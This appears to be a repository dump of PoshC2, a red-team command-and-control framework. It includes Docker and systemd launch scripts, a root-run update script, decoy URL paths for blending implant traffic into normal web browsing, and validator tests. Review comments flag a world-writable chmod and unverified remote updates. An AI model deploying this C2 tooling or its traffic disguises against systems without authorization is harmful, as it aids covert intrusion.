| get_docker_image_name 14 | 15 | pushd "$POSH_DIR" >/dev/null 16 | 17 | if [ "$?" -eq "0" ]; then 18 | posh-docker-clean 19 | sudo -E docker build -t "$DOCKER_IMAGE_NAME" . 
"$@" 20 | popd > /dev/null 21 | fi 22 | 23 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-clean: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Do a full docker system prune, cleaning up all unused images & containers?" 4 | echo "*** This includes anything none-PoshC2 related. ***" 5 | read -p "Would you like to do a clean? y/N " -n 1 -r 6 | echo "" 7 | if [[ "$REPLY" =~ ^[Yy]$ ]] 8 | then 9 | sudo -E docker system prune -f 10 | fi 11 | 12 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-debug: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_projects_dir 5 | get_docker_posh_projects_dir 6 | get_docker_image_name 7 | 8 | show_help(){ 9 | echo "*** PoshC2 Docker Debug ***" 10 | echo "Usage:" 11 | echo "posh-docker-debug -t " 12 | echo "" 13 | echo "Default Docker tag is latest (master)" 14 | } 15 | 16 | DOCKER_TAG="latest" 17 | 18 | while getopts "h?t:" opt; do 19 | case "$opt" in 20 | h|\?) 
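        show_help
        exit 0
        ;;
    t) DOCKER_TAG="$OPTARG"
        ;;
    esac
done

sudo -E docker run -ti --rm -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /bin/bash

--------------------------------------------------------------------------------
/resources/scripts/posh-docker-server:
--------------------------------------------------------------------------------
#!/bin/bash
# posh-docker-server - run the PoshC2 server inside the Docker image with the
# projects directory bind-mounted and the C2 BindPort published.

source /usr/local/bin/_posh-common
get_posh_project_dir
get_posh_projects_dir
get_docker_posh_projects_dir
get_docker_image_name

show_help(){
  echo "*** PoshC2 Docker Server ***"
  echo "Usage:"
  echo "posh-server -t "
  echo ""
  echo "Default Docker tag is latest (master)"
}

DOCKER_TAG="latest"
# Initialised explicitly (as posh-docker does) so only -d can set it.
DEV=""

while getopts "h?t:d" opt; do
  case "$opt" in
  h|\?)
    show_help
    exit 0
    ;;
  t) DOCKER_TAG="$OPTARG"
    ;;
  d) DEV="-v /opt/PoshC2:/opt/PoshC2"
    ;;
  esac
done

# NOTE(review): this makes the whole project directory - config.yml (C2 key,
# proxy/database credentials), the database, logs and generated payloads -
# readable AND writable by every local account, recursively. It is presumably
# here so the container's user can write to the bind mount; running the
# container with a matching --user/group would avoid a world-writable tree.
# Kept because the image's runtime user is not visible from this script, but
# it now runs after option parsing, so `-h` no longer changes permissions.
sudo chmod -R a+rwx "$POSH_PROJECT_DIR"

POSHC2_PORT=$(grep "BindPort: " "$POSH_PROJECT_DIR/config.yml" | grep -o -e "[0-9]\+")

# Fix: with no BindPort in config.yml the original ran `docker run -p :` and
# failed with an unhelpful Docker error.
if [ -z "$POSHC2_PORT" ]; then
  echo "[-] Could not read BindPort from $POSH_PROJECT_DIR/config.yml"
  exit 1
fi

sudo -E docker run --rm -l posh-server -p "$POSHC2_PORT:$POSHC2_PORT" -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" $DEV "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /usr/local/bin/posh-server
--------------------------------------------------------------------------------
/resources/scripts/posh-docker-stop-server:
--------------------------------------------------------------------------------
#!/bin/bash

source /usr/local/bin/_posh-common
get_docker_image_name

echo "[*] Stopping the PoshC2 server Docker container..."
CONTAINER=`sudo docker ps -q -f label=posh-server -f ancestor=$DOCKER_IMAGE_NAME`
if [ ! 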
-z "$CONTAINER" ]; then 9 | sudo docker stop "$CONTAINER" >/dev/null 10 | echo "[+] Done" 11 | else 12 | echo "[*] No running PoshC2 server containers found" 13 | fi -------------------------------------------------------------------------------- /resources/scripts/posh-log: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_project_dir 5 | 6 | tail -n 5000 -f "$POSH_PROJECT_DIR/poshc2_server.log" 2>/dev/null\ 7 | || ( echo -e "\e[31m[!] Could not open logfile: "$POSH_PROJECT_DIR/poshc2_server.log"\e[0m") 8 | 9 | -------------------------------------------------------------------------------- /resources/scripts/posh-server: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | get_posh_project_dir 14 | 15 | pushd $POSH_DIR >/dev/null 16 | if [ "$?" 
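-eq "0" ]; then

  sudo python3 -m pipenv run python3 -u start.py --server 2>&1 | sudo tee -a "$POSH_PROJECT_DIR/poshc2_server.log"
  popd > /dev/null
fi
--------------------------------------------------------------------------------
/resources/scripts/posh-service:
--------------------------------------------------------------------------------
#!/bin/bash
# posh-service - enable and (re)start the PoshC2 API and C2 systemd units,
# wait about ten seconds for each one's log file to appear, then tail the C2
# log. Both units run as root (User=root in poshc2.service / poshc2.api.service).

source /usr/local/bin/_posh-common
get_posh_project_dir

# wait_for_file FILE - poll once a second, at most 11 times, until FILE exists.
# Fix: the original reused a single, never-initialised counter `x` for both
# wait loops, so when the first loop timed out (x=11) the second loop did not
# run at all and posh-log was started before the C2 log existed.
wait_for_file(){
  local x=0
  while [[ $x -le 10 ]]; do
    if [ -f "$1" ]; then
      break;
    fi
    sleep 1s
    x=$(( $x + 1 ))
  done
}

sudo systemctl enable poshc2.api.service >/dev/null
sudo systemctl restart poshc2.api.service >/dev/null
wait_for_file "$POSH_PROJECT_DIR/poshc2_api_server.log"

sudo systemctl enable poshc2.service >/dev/null
sudo systemctl restart poshc2.service >/dev/null
wait_for_file "$POSH_PROJECT_DIR/poshc2_server.log"
/usr/local/bin/posh-log

--------------------------------------------------------------------------------
/resources/scripts/posh-service-ansible:
--------------------------------------------------------------------------------
#!/bin/bash

source /usr/local/bin/_posh-common
get_posh_project_dir

sudo systemctl enable poshc2.service >/dev/null
sudo systemctl restart poshc2.service >/dev/null
while [[ $x -le 10 ]]; do
  if [ -f "$POSH_PROJECT_DIR/poshc2_server.log" ]; then
    break;
  fi
  sleep 1s
  x=$(( $x + 1 ))
done
--------------------------------------------------------------------------------
/resources/scripts/posh-stop-service:
--------------------------------------------------------------------------------
#!/bin/bash

sudo systemctl stop poshc2.service >/dev/null
sudo systemctl disable poshc2.service >/dev/null

sudo systemctl stop poshc2.api.service >/dev/null
sudo systemctl disable 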
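poshc2.api.service >/dev/null

--------------------------------------------------------------------------------
/resources/scripts/posh-update:
--------------------------------------------------------------------------------
#!/bin/bash
# posh-update - hard-reset the PoshC2 checkout to origin/<branch> and re-run
# Install.sh. Must be run as root (checked below, after the banner).
#
# NOTE(review): this is remote code execution by design: it fetches whatever
# origin/<branch> currently points at, discards local changes with
# `git reset --hard`, then executes ./Install.sh from that tree as root.
# Nothing is pinned or verified (no tag, commit hash or signature check), so
# the integrity of the team server rests entirely on the remote and the
# transport. Consider pinning to a tag, or reviewing
# `git log HEAD..origin/<branch>` before resetting.

# trap ctrl-c and call ctrl_c()
trap ctrl_c INT

function ctrl_c() {
  popd > /dev/null
  exit
}

# A POSIX variable
OPTIND=1         # Reset in case getopts has been used previously in the shell.

# Initialize our own variables:
GIT_BRANCH="master"
MANUAL_BRANCH_SET=false
SKIP_INSTALL=false

show_help(){
  echo "*** PoshC2 Update Script ***"
  echo "Usage:"
  echo "posh-update -b "
  echo "posh-update-core -b "
  echo "posh-update-core -b -x (Skips running install script)"
  echo ""
  echo "Default is the master branch"
}

while getopts "xh?b:" opt; do
  case "$opt" in
  h|\?)
    show_help
    exit 0
    ;;
  b) GIT_BRANCH="$OPTARG"
    MANUAL_BRANCH_SET=true
    ;;
  x) SKIP_INSTALL=true
    ;;
  esac
done



source /usr/local/bin/_posh-common
get_posh_dir

pushd "$POSH_DIR" >/dev/null

if [ "$?" -eq "0" ]; then

  # Without -b, update the branch that is currently checked out.
  if [ "$MANUAL_BRANCH_SET" == "false" ]; then
    GIT_BRANCH=`git rev-parse --abbrev-ref HEAD`
  fi

  echo ""
  echo -e """\033[92m
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
================= www.PoshC2.co.uk ================"""
  echo ""
  echo "[+] Updating PoshC2"
  echo ""

  if [[ $(id -u) -ne 0 ]]; then
    echo -e "You must run this installer as root.\nQuitting!";
    exit 1;
  fi

  echo ""
  echo "[+] Updating Posh Installation to latest $GIT_BRANCH"
  # Fix: a failed fetch (offline, auth error, removed remote) used to be
  # ignored, and the script went on to reset and run Install.sh regardless.
  if ! git fetch; then
    echo "[-] git fetch failed, not updating"
    popd > /dev/null
    exit 1
  fi
  git reset --hard origin/"$GIT_BRANCH"

  if [ "$SKIP_INSTALL" == "false" ]; then

    echo ""
    echo "[+] Running Install script"
    ./Install.sh -b "$GIT_BRANCH" -p "$POSH_DIR"

  fi

  echo ""
  echo "[+] Update complete"
  echo ""

  popd > /dev/null
fi
--------------------------------------------------------------------------------
/resources/scripts/poshc2.api.service:
--------------------------------------------------------------------------------
[Unit]
Description=PoshC2 API Server

[Service]
Type=simple
User=root
ExecStart=/usr/local/bin/posh-api-server

[Install]
WantedBy=default.target
--------------------------------------------------------------------------------
/resources/scripts/poshc2.service:
--------------------------------------------------------------------------------
[Unit]
Description=PoshC2 Server

[Service]
Type=simple
User=root
ExecStart=/usr/local/bin/posh-server

[Install]
WantedBy=default.target
--------------------------------------------------------------------------------
/resources/urls.txt:
--------------------------------------------------------------------------------
/adsense/troubleshooter/1631343/
/adServingData/PROD/TMClient/6/8736/
/advanced_search?hl=en-GB&fg=
/async/newtab?ei=
/babel-polyfill/6.3.14/polyfill.min.js=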
/bh/sync/aol?rurl=/ups/55972/sync?origin=
/bootstrap/3.1.1/bootstrap.min.js?p=
/branch-locator/search.asp?WT.ac&api=
/business/home.asp&ved=
/business/retail-business/insurance.asp?WT.mc_id=
/cdba?ptv=48&profileId=125&av=1&cb=
/cisben/marketq?bartype=AREA&showheader=FALSE&showvaluemarkers=
/classroom/sharewidget/widget_stable.html?usegapi=
/client_204?&atyp=i&biw=1920&bih=921&ei=
/load/pages/index.php?t=
/putil/2018/0/11/po.html?ved=
/qqzddddd/2018/load.php?lang=en&modules=
/status/995598521343541248/query=
/TOS?loc=GB&hl=en&privacy=
/trader-update/history&pd=
/types/translation/v1/articles/
/uasclient/0.1.34/modules/
/usersync/tradedesk/
/utag/lbg/main/prod/utag.15.js?utv=
/vfe01s/1/vsopts.js?
/vssf/wppo/site/bgroup/visitor/
/wpaas/load.php?debug=false&lang=en&modules=
/web/20110920084728/
/webhp?hl=en&sa=X&ved=
/work/embedded/search?oid=
/GoPro5/black/2018/
/Philips/v902/
--------------------------------------------------------------------------------
/start.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

# Thin launcher: all argument handling lives in poshc2.run.
from poshc2 import run

if __name__ == '__main__':
    run()
--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/tests/__init__.py
--------------------------------------------------------------------------------
/tests/test_utils.py:
--------------------------------------------------------------------------------
import pytest  # not referenced below

from poshc2.Utils import validate_sleep_time, validate_kill_date


def test_validate_sleep_time() -> None:
    """Pin the accepted sleep-time grammar: digits followed by s/m/h.

    Failure is signalled by a ``None`` return (hence ``is None`` /
    ``is not None`` rather than truthiness). Leading/trailing whitespace is
    tolerated; a space between the number and the unit, a ``d`` unit, a unit
    with no number, the empty string and ``None`` are all rejected.
    """
    assert validate_sleep_time("5h") is not None
    assert validate_sleep_time("4m") is not None
    assert validate_sleep_time("3s ") is not None
    assert validate_sleep_time(" 5000h ") is not None
    assert validate_sleep_time(" 999 s ") is None
    assert validate_sleep_time("999 s") is None
    assert validate_sleep_time("999d") is None
    assert validate_sleep_time("s") is None
    assert validate_sleep_time("asdf") is None
    assert validate_sleep_time("") is None
    assert validate_sleep_time(None) is None


def test_validate_killdate() -> None:
    """Pin kill-date validation: ``YYYY-MM-DD`` with an in-range month and day.

    Unlike validate_sleep_time, the result is asserted by truthiness, so the
    return type only needs to be falsy on rejection. A month of 13 or a day of
    45 is rejected even though it matches the shape; surrounding whitespace is
    tolerated.
    """
    assert not validate_kill_date("0123-45-67")
    assert not validate_kill_date("0000-00-0")
    assert not validate_kill_date("bad")
    assert not validate_kill_date("")
    assert not validate_kill_date("2020-01-45")
    assert not validate_kill_date("2020-13-01")
    assert validate_kill_date("2020-01-01")
    assert validate_kill_date(" 2020-01-01 ")
--------------------------------------------------------------------------------